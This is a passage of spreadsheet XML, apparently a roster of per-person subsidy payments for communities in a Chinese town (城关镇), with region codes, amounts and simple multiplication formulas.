    <row r="1118" ht="23" customHeight="1" spans="1:11">
      <c r="A1118" s="13" t="s">
        <v>2973</v>
      </c>
      <c r="B1118" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1118" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1118" s="14" t="s">
        <v>2974</v>
      </c>
      <c r="E1118" s="14" t="s">
        <v>2975</v>
      </c>
      <c r="F1118" s="14">
        <v>4113210106</v>
      </c>
      <c r="G1118" s="14">
        <v>2</v>
      </c>
      <c r="H1118" s="14">
        <v>300</v>
      </c>
      <c r="I1118" s="14">
        <f>H1118*G1118</f>
        <v>600</v>
      </c>
      <c r="J1118" s="14">
        <v>45292</v>
      </c>
      <c r="K1118" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1119" ht="23" customHeight="1" spans="1:11">
      <c r="A1119" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B1119" s="14" t="str">
        <f>B1118</f>
        <v>城关镇</v>
      </c>
      <c r="C1119" s="14" t="str">
        <f>C1118</f>
        <v>西北社区</v>
      </c>
      <c r="D1119" s="21" t="s">
        <v>2977</v>
      </c>
      <c r="E1119" s="21" t="s">
        <v>337</v>
      </c>
      <c r="F1119" s="14">
        <f>F1118</f>
        <v>4113210106</v>
      </c>
      <c r="G1119" s="14"/>
      <c r="H1119" s="14"/>
      <c r="I1119" s="14"/>
      <c r="J1119" s="14"/>
      <c r="K1119" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1120" ht="23" customHeight="1" spans="1:11">
      <c r="A1120" s="13" t="s">
        <v>2978</v>
      </c>
      <c r="B1120" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1120" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1120" s="14" t="s">
        <v>2979</v>
      </c>
      <c r="E1120" s="14" t="s">
        <v>2428</v>
      </c>
      <c r="F1120" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1120" s="14">
        <v>1</v>
      </c>
      <c r="H1120" s="14">
        <v>340</v>
      </c>
      <c r="I1120" s="14">
        <f t="shared" ref="I1120:I1130" si="54">H1120*G1120</f>
        <v>340</v>
      </c>
      <c r="J1120" s="14">
        <v>45292</v>
      </c>
      <c r="K1120" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1121" ht="23" customHeight="1" spans="1:11">
      <c r="A1121" s="13" t="s">
        <v>2980</v>
      </c>
      <c r="B1121" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1121" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1121" s="14" t="s">
        <v>2981</v>
      </c>
      <c r="E1121" s="14" t="s">
        <v>2982</v>
      </c>
      <c r="F1121" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1121" s="14">
        <v>1</v>
      </c>
      <c r="H1121" s="14">
        <v>340</v>
      </c>
      <c r="I1121" s="14">
        <f t="shared" si="54"/>
        <v>340</v>
      </c>
      <c r="J1121" s="14">
        <v>45292</v>
      </c>
      <c r="K1121" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1122" ht="23" customHeight="1" spans="1:11">
      <c r="A1122" s="13" t="s">
        <v>2983</v>
      </c>
      <c r="B1122" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1122" s="14" t="s">
        <v>2984</v>
      </c>
      <c r="D1122" s="14" t="s">
        <v>2985</v>
      </c>
      <c r="E1122" s="14" t="s">
        <v>2986</v>
      </c>
      <c r="F1122" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1122" s="14">
        <v>1</v>
      </c>
      <c r="H1122" s="14">
        <v>340</v>
      </c>
      <c r="I1122" s="14">
        <f t="shared" si="54"/>
        <v>340</v>
      </c>
      <c r="J1122" s="14">
        <v>45292</v>
      </c>
      <c r="K1122" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1123" ht="23" customHeight="1" spans="1:11">
      <c r="A1123" s="13" t="s">
        <v>2987</v>
      </c>
      <c r="B1123" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1123" s="14" t="s">
        <v>2988</v>
      </c>
      <c r="D1123" s="14" t="s">
        <v>2989</v>
      </c>
      <c r="E1123" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F1123" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1123" s="14">
        <v>1</v>
      </c>
      <c r="H1123" s="14">
        <v>340</v>
      </c>
      <c r="I1123" s="14">
        <f t="shared" si="54"/>
        <v>340</v>
      </c>
      <c r="J1123" s="14">
        <v>45292</v>
      </c>
      <c r="K1123" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1124" ht="23" customHeight="1" spans="1:11">
      <c r="A1124" s="13" t="s">
        <v>2990</v>
      </c>
      <c r="B1124" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1124" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1124" s="14" t="s">
        <v>2991</v>
      </c>
      <c r="E1124" s="14" t="s">
        <v>689</v>
      </c>
      <c r="F1124" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1124" s="14">
        <v>1</v>
      </c>
      <c r="H1124" s="14">
        <v>340</v>
      </c>
      <c r="I1124" s="14">
        <f t="shared" si="54"/>
        <v>340</v>
      </c>
      <c r="J1124" s="14">
        <v>45292</v>
      </c>
      <c r="K1124" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1125" ht="23" customHeight="1" spans="1:11">
      <c r="A1125" s="13" t="s">
        <v>2992</v>
      </c>
      <c r="B1125" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1125" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1125" s="14" t="s">
        <v>2993</v>
      </c>
      <c r="E1125" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F1125" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1125" s="14">
        <v>2</v>
      </c>
      <c r="H1125" s="14">
        <v>300</v>
      </c>
      <c r="I1125" s="14">
        <f t="shared" si="54"/>
        <v>600</v>
      </c>
      <c r="J1125" s="14">
        <v>45292</v>
      </c>
      <c r="K1125" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1126" ht="23" customHeight="1" spans="1:11">
      <c r="A1126" s="13" t="s">
        <v>2994</v>
      </c>
      <c r="B1126" s="14" t="str">
        <f>B1125</f>
        <v>城关镇</v>
      </c>
      <c r="C1126" s="14" t="str">
        <f>C1125</f>
        <v>中华社区</v>
      </c>
      <c r="D1126" s="25" t="s">
        <v>2995</v>
      </c>
      <c r="E1126" s="25" t="s">
        <v>527</v>
      </c>
      <c r="F1126" s="14">
        <f>F1125</f>
        <v>4113210108</v>
      </c>
      <c r="G1126" s="14"/>
      <c r="H1126" s="14"/>
      <c r="I1126" s="14"/>
      <c r="J1126" s="14"/>
      <c r="K1126" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1127" ht="23" customHeight="1" spans="1:11">
      <c r="A1127" s="13" t="s">
        <v>2996</v>
      </c>
      <c r="B1127" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1127" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1127" s="14" t="s">
        <v>2997</v>
      </c>
      <c r="E1127" s="14" t="s">
        <v>2998</v>
      </c>
      <c r="F1127" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1127" s="14">
        <v>1</v>
      </c>
      <c r="H1127" s="14">
        <v>340</v>
      </c>
      <c r="I1127" s="14">
        <f t="shared" ref="I1127:I1135" si="55">H1127*G1127</f>
        <v>340</v>
      </c>
      <c r="J1127" s="14">
        <v>45292</v>
      </c>
      <c r="K1127" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1128" ht="23" customHeight="1" spans="1:11">
      <c r="A1128" s="13" t="s">
        <v>2999</v>
      </c>
      <c r="B1128" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1128" s="14" t="s">
        <v>3000</v>
      </c>
      <c r="D1128" s="14" t="s">
        <v>3001</v>
      </c>
      <c r="E1128" s="14" t="s">
        <v>3002</v>
      </c>
      <c r="F1128" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1128" s="14">
        <v>1</v>
      </c>
      <c r="H1128" s="14">
        <v>340</v>
      </c>
      <c r="I1128" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1128" s="14">
        <v>45352</v>
      </c>
      <c r="K1128" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1129" ht="23" customHeight="1" spans="1:11">
      <c r="A1129" s="13" t="s">
        <v>3003</v>
      </c>
      <c r="B1129" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1129" s="14" t="s">
        <v>2914</v>
      </c>
      <c r="D1129" s="14" t="s">
        <v>3004</v>
      </c>
      <c r="E1129" s="14" t="s">
        <v>3005</v>
      </c>
      <c r="F1129" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1129" s="14">
        <v>1</v>
      </c>
      <c r="H1129" s="14">
        <v>340</v>
      </c>
      <c r="I1129" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1129" s="14">
        <v>45352</v>
      </c>
      <c r="K1129" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1130" ht="23" customHeight="1" spans="1:11">
      <c r="A1130" s="13" t="s">
        <v>3006</v>
      </c>
      <c r="B1130" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1130" s="14" t="s">
        <v>3007</v>
      </c>
      <c r="D1130" s="14" t="s">
        <v>3008</v>
      </c>
      <c r="E1130" s="14" t="s">
        <v>587</v>
      </c>
      <c r="F1130" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1130" s="14">
        <v>1</v>
      </c>
      <c r="H1130" s="14">
        <v>340</v>
      </c>
      <c r="I1130" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1130" s="14">
        <v>45352</v>
      </c>
      <c r="K1130" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1131" ht="23" customHeight="1" spans="1:11">
      <c r="A1131" s="13" t="s">
        <v>3009</v>
      </c>
      <c r="B1131" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1131" s="14" t="s">
        <v>3010</v>
      </c>
      <c r="D1131" s="14" t="s">
        <v>3011</v>
      </c>
      <c r="E1131" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F1131" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1131" s="14">
        <v>1</v>
      </c>
      <c r="H1131" s="14">
        <v>340</v>
      </c>
      <c r="I1131" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1131" s="14">
        <v>45352</v>
      </c>
      <c r="K1131" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1132" ht="23" customHeight="1" spans="1:11">
      <c r="A1132" s="13" t="s">
        <v>3012</v>
      </c>
      <c r="B1132" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1132" s="14" t="s">
        <v>3013</v>
      </c>
      <c r="D1132" s="14" t="s">
        <v>3014</v>
      </c>
      <c r="E1132" s="14" t="s">
        <v>2986</v>
      </c>
      <c r="F1132" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1132" s="14">
        <v>1</v>
      </c>
      <c r="H1132" s="14">
        <v>340</v>
      </c>
      <c r="I1132" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1132" s="14">
        <v>45352</v>
      </c>
      <c r="K1132" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1133" ht="23" customHeight="1" spans="1:11">
      <c r="A1133" s="13" t="s">
        <v>3015</v>
      </c>
      <c r="B1133" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1133" s="14" t="s">
        <v>3016</v>
      </c>
      <c r="D1133" s="14" t="s">
        <v>3017</v>
      </c>
      <c r="E1133" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F1133" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1133" s="14">
        <v>1</v>
      </c>
      <c r="H1133" s="14">
        <v>340</v>
      </c>
      <c r="I1133" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1133" s="14">
        <v>45352</v>
      </c>
      <c r="K1133" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1134" ht="23" customHeight="1" spans="1:11">
      <c r="A1134" s="13" t="s">
        <v>3018</v>
      </c>
      <c r="B1134" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1134" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1134" s="14" t="s">
        <v>3019</v>
      </c>
      <c r="E1134" s="14" t="s">
        <v>1507</v>
      </c>
      <c r="F1134" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1134" s="14">
        <v>1</v>
      </c>
      <c r="H1134" s="14">
        <v>340</v>
      </c>
      <c r="I1134" s="14">
        <f t="shared" si="55"/>
        <v>340</v>
      </c>
      <c r="J1134" s="14">
        <v>45352</v>
      </c>
      <c r="K1134" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1135" ht="23" customHeight="1" spans="1:11">
      <c r="A1135" s="13" t="s">
        <v>3020</v>
      </c>
      <c r="B1135" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1135" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1135" s="14" t="s">
        <v>3021</v>
      </c>
      <c r="E1135" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1135" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1135" s="14">
        <v>2</v>
      </c>
      <c r="H1135" s="14">
        <v>300</v>
      </c>
      <c r="I1135" s="14">
        <f t="shared" si="55"/>
        <v>600</v>
      </c>
      <c r="J1135" s="14">
        <v>45352</v>
      </c>
      <c r="K1135" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1136" ht="23" customHeight="1" spans="1:11">
      <c r="A1136" s="13" t="s">
        <v>3022</v>
      </c>
      <c r="B1136" s="14" t="str">
        <f>B1135</f>
        <v>城关镇</v>
      </c>
      <c r="C1136" s="14" t="str">
        <f>C1135</f>
        <v>北外社区</v>
      </c>
      <c r="D1136" s="21" t="s">
        <v>3023</v>
      </c>
      <c r="E1136" s="21" t="s">
        <v>3024</v>
      </c>
      <c r="F1136" s="14" t="str">
        <f>F1135</f>
        <v>4113210102</v>
      </c>
      <c r="G1136" s="14"/>
      <c r="H1136" s="14"/>
      <c r="I1136" s="14"/>
      <c r="J1136" s="14"/>
      <c r="K1136" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1137" ht="23" customHeight="1" spans="1:11">
      <c r="A1137" s="13" t="s">
        <v>3025</v>
      </c>
      <c r="B1137" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1137" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1137" s="14" t="s">
        <v>3026</v>
      </c>
      <c r="E1137" s="14" t="s">
        <v>3027</v>
      </c>
      <c r="F1137" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1137" s="14">
        <v>1</v>
      </c>
      <c r="H1137" s="14">
        <v>500</v>
      </c>
      <c r="I1137" s="14">
        <v>500</v>
      </c>
      <c r="J1137" s="14">
        <v>45261</v>
      </c>
      <c r="K1137" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1138" ht="23" customHeight="1" spans="1:11">
      <c r="A1138" s="13" t="s">
        <v>3028</v>
      </c>
      <c r="B1138" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1138" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1138" s="14" t="s">
        <v>3029</v>
      </c>
      <c r="E1138" s="14" t="s">
        <v>3030</v>
      </c>
      <c r="F1138" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1138" s="14">
        <v>1</v>
      </c>
      <c r="H1138" s="14">
        <v>500</v>
      </c>
      <c r="I1138" s="14">
        <v>500</v>
      </c>
      <c r="J1138" s="14">
        <v>45261</v>
      </c>
      <c r="K1138" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1139" ht="23" customHeight="1" spans="1:11">
      <c r="A1139" s="13" t="s">
        <v>3031</v>
      </c>
      <c r="B1139" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1139" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1139" s="14" t="s">
        <v>3032</v>
      </c>
      <c r="E1139" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F1139" s="14">
        <v>4113210107</v>
      </c>
      <c r="G1139" s="14">
        <v>1</v>
      </c>
      <c r="H1139" s="14">
        <v>340</v>
      </c>
      <c r="I1139" s="14">
        <f t="shared" ref="I1139:I1182" si="56">H1139*G1139</f>
        <v>340</v>
      </c>
      <c r="J1139" s="14">
        <v>45261</v>
      </c>
      <c r="K1139" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1140" ht="23" customHeight="1" spans="1:11">
      <c r="A1140" s="13" t="s">
        <v>3033</v>
      </c>
      <c r="B1140" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1140" s="14" t="s">
        <v>2043</v>
      </c>
      <c r="D1140" s="14" t="s">
        <v>3034</v>
      </c>
      <c r="E1140" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F1140" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1140" s="14">
        <v>1</v>
      </c>
      <c r="H1140" s="14">
        <v>340</v>
      </c>
      <c r="I1140" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1140" s="14">
        <v>45323</v>
      </c>
      <c r="K1140" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1141" ht="23" customHeight="1" spans="1:11">
      <c r="A1141" s="13" t="s">
        <v>3035</v>
      </c>
      <c r="B1141" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1141" s="14" t="s">
        <v>3036</v>
      </c>
      <c r="D1141" s="14" t="s">
        <v>3037</v>
      </c>
      <c r="E1141" s="14" t="s">
        <v>3038</v>
      </c>
      <c r="F1141" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1141" s="14">
        <v>1</v>
      </c>
      <c r="H1141" s="14">
        <v>340</v>
      </c>
      <c r="I1141" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1141" s="14">
        <v>45323</v>
      </c>
      <c r="K1141" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1142" ht="23" customHeight="1" spans="1:11">
      <c r="A1142" s="13" t="s">
        <v>3039</v>
      </c>
      <c r="B1142" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1142" s="14" t="s">
        <v>3040</v>
      </c>
      <c r="D1142" s="14" t="s">
        <v>3041</v>
      </c>
      <c r="E1142" s="14" t="s">
        <v>3042</v>
      </c>
      <c r="F1142" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G1142" s="14">
        <v>1</v>
      </c>
      <c r="H1142" s="14">
        <v>340</v>
      </c>
      <c r="I1142" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1142" s="14">
        <v>45323</v>
      </c>
      <c r="K1142" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1143" ht="23" customHeight="1" spans="1:11">
      <c r="A1143" s="13" t="s">
        <v>3043</v>
      </c>
      <c r="B1143" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1143" s="14" t="s">
        <v>3044</v>
      </c>
      <c r="D1143" s="14" t="s">
        <v>3045</v>
      </c>
      <c r="E1143" s="14" t="s">
        <v>3046</v>
      </c>
      <c r="F1143" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1143" s="14">
        <v>1</v>
      </c>
      <c r="H1143" s="14">
        <v>340</v>
      </c>
      <c r="I1143" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1143" s="14">
        <v>45323</v>
      </c>
      <c r="K1143" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1144" ht="23" customHeight="1" spans="1:11">
      <c r="A1144" s="13" t="s">
        <v>3047</v>
      </c>
      <c r="B1144" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1144" s="14" t="s">
        <v>3048</v>
      </c>
      <c r="D1144" s="14" t="s">
        <v>2200</v>
      </c>
      <c r="E1144" s="14" t="s">
        <v>3049</v>
      </c>
      <c r="F1144" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1144" s="14">
        <v>1</v>
      </c>
      <c r="H1144" s="14">
        <v>340</v>
      </c>
      <c r="I1144" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1144" s="14">
        <v>45383</v>
      </c>
      <c r="K1144" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1145" ht="23" customHeight="1" spans="1:11">
      <c r="A1145" s="13" t="s">
        <v>3050</v>
      </c>
      <c r="B1145" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1145" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1145" s="14" t="s">
        <v>3051</v>
      </c>
      <c r="E1145" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F1145" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1145" s="14">
        <v>1</v>
      </c>
      <c r="H1145" s="14">
        <v>340</v>
      </c>
      <c r="I1145" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1145" s="14">
        <v>45383</v>
      </c>
      <c r="K1145" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1146" ht="23" customHeight="1" spans="1:11">
      <c r="A1146" s="13" t="s">
        <v>3052</v>
      </c>
      <c r="B1146" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1146" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1146" s="14" t="s">
        <v>3053</v>
      </c>
      <c r="E1146" s="14" t="s">
        <v>3054</v>
      </c>
      <c r="F1146" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1146" s="14">
        <v>1</v>
      </c>
      <c r="H1146" s="14">
        <v>340</v>
      </c>
      <c r="I1146" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1146" s="14">
        <v>45383</v>
      </c>
      <c r="K1146" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1147" ht="23" customHeight="1" spans="1:11">
      <c r="A1147" s="13" t="s">
        <v>3055</v>
      </c>
      <c r="B1147" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1147" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D1147" s="14" t="s">
        <v>3056</v>
      </c>
      <c r="E1147" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F1147" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1147" s="14">
        <v>1</v>
      </c>
      <c r="H1147" s="14">
        <v>340</v>
      </c>
      <c r="I1147" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1147" s="14">
        <v>45200</v>
      </c>
      <c r="K1147" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1148" ht="23" customHeight="1" spans="1:11">
      <c r="A1148" s="13" t="s">
        <v>3057</v>
      </c>
      <c r="B1148" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1148" s="14" t="s">
        <v>3058</v>
      </c>
      <c r="D1148" s="14" t="s">
        <v>3059</v>
      </c>
      <c r="E1148" s="14" t="s">
        <v>517</v>
      </c>
      <c r="F1148" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1148" s="14">
        <v>1</v>
      </c>
      <c r="H1148" s="14">
        <v>340</v>
      </c>
      <c r="I1148" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1148" s="14">
        <v>45413</v>
      </c>
      <c r="K1148" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1149" ht="23" customHeight="1" spans="1:11">
      <c r="A1149" s="13" t="s">
        <v>3060</v>
      </c>
      <c r="B1149" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1149" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1149" s="14" t="s">
        <v>3061</v>
      </c>
      <c r="E1149" s="14" t="s">
        <v>337</v>
      </c>
      <c r="F1149" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1149" s="14">
        <v>1</v>
      </c>
      <c r="H1149" s="14">
        <v>340</v>
      </c>
      <c r="I1149" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1149" s="14">
        <v>45444</v>
      </c>
      <c r="K1149" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1150" ht="23" customHeight="1" spans="1:11">
      <c r="A1150" s="13" t="s">
        <v>3062</v>
      </c>
      <c r="B1150" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1150" s="14" t="s">
        <v>3063</v>
      </c>
      <c r="D1150" s="14" t="s">
        <v>3064</v>
      </c>
      <c r="E1150" s="14" t="s">
        <v>295</v>
      </c>
      <c r="F1150" s="14">
        <v>4113210103</v>
      </c>
      <c r="G1150" s="14">
        <v>1</v>
      </c>
      <c r="H1150" s="14">
        <v>340</v>
      </c>
      <c r="I1150" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1150" s="14">
        <v>45444</v>
      </c>
      <c r="K1150" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1151" ht="23" customHeight="1" spans="1:11">
      <c r="A1151" s="13" t="s">
        <v>3065</v>
      </c>
      <c r="B1151" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1151" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1151" s="14" t="s">
        <v>3066</v>
      </c>
      <c r="E1151" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F1151" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1151" s="14">
        <v>1</v>
      </c>
      <c r="H1151" s="14">
        <v>340</v>
      </c>
      <c r="I1151" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1151" s="14">
        <v>45444</v>
      </c>
      <c r="K1151" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1152" ht="23" customHeight="1" spans="1:11">
      <c r="A1152" s="13" t="s">
        <v>3067</v>
      </c>
      <c r="B1152" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1152" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1152" s="14" t="s">
        <v>3068</v>
      </c>
      <c r="E1152" s="14" t="s">
        <v>3069</v>
      </c>
      <c r="F1152" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1152" s="14">
        <v>1</v>
      </c>
      <c r="H1152" s="14">
        <v>340</v>
      </c>
      <c r="I1152" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1152" s="14">
        <v>45444</v>
      </c>
      <c r="K1152" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1153" ht="23" customHeight="1" spans="1:11">
      <c r="A1153" s="13" t="s">
        <v>3070</v>
      </c>
      <c r="B1153" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1153" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1153" s="14" t="s">
        <v>3071</v>
      </c>
      <c r="E1153" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1153" s="14">
        <v>4113210107</v>
      </c>
      <c r="G1153" s="14">
        <v>1</v>
      </c>
      <c r="H1153" s="14">
        <v>340</v>
      </c>
      <c r="I1153" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1153" s="14">
        <v>45444</v>
      </c>
      <c r="K1153" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1154" ht="23" customHeight="1" spans="1:11">
      <c r="A1154" s="13" t="s">
        <v>3072</v>
      </c>
      <c r="B1154" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1154" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D1154" s="14" t="s">
        <v>3073</v>
      </c>
      <c r="E1154" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F1154" s="17">
        <v>4113210106</v>
      </c>
      <c r="G1154" s="14">
        <v>1</v>
      </c>
      <c r="H1154" s="14">
        <v>340</v>
      </c>
      <c r="I1154" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1154" s="24">
        <v>45108</v>
      </c>
      <c r="K1154" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1155" ht="23" customHeight="1" spans="1:11">
      <c r="A1155" s="13" t="s">
        <v>3074</v>
      </c>
      <c r="B1155" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1155" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1155" s="14" t="s">
        <v>3075</v>
      </c>
      <c r="E1155" s="14" t="s">
        <v>3076</v>
      </c>
      <c r="F1155" s="26">
        <v>4113210103</v>
      </c>
      <c r="G1155" s="14">
        <v>1</v>
      </c>
      <c r="H1155" s="14">
        <v>340</v>
      </c>
      <c r="I1155" s="14">
        <f t="shared" si="56"/>
        <v>340</v>
      </c>
      <c r="J1155" s="24">
        <v>45108</v>
      </c>
      <c r="K1155" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1156" ht="23" customHeight="1" spans="1:11">
      <c r="A1156" s="13" t="s">
        <v>3077</v>
      </c>
      <c r="B1156" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1156" s="17" t="s">
        <v>2082</v>
      </c>
      <c r="D1156" s="17" t="s">
        <v>3078</v>
      </c>
      <c r="E1156" s="27" t="s">
        <v>265</v>
      </c>
      <c r="F1156" s="22">
        <v>4113210102</v>
      </c>
      <c r="G1156" s="14">
        <v>1</v>
      </c>
      <c r="H1156" s="14">
        <v>340</v>
      </c>
      <c r="I1156" s="14">
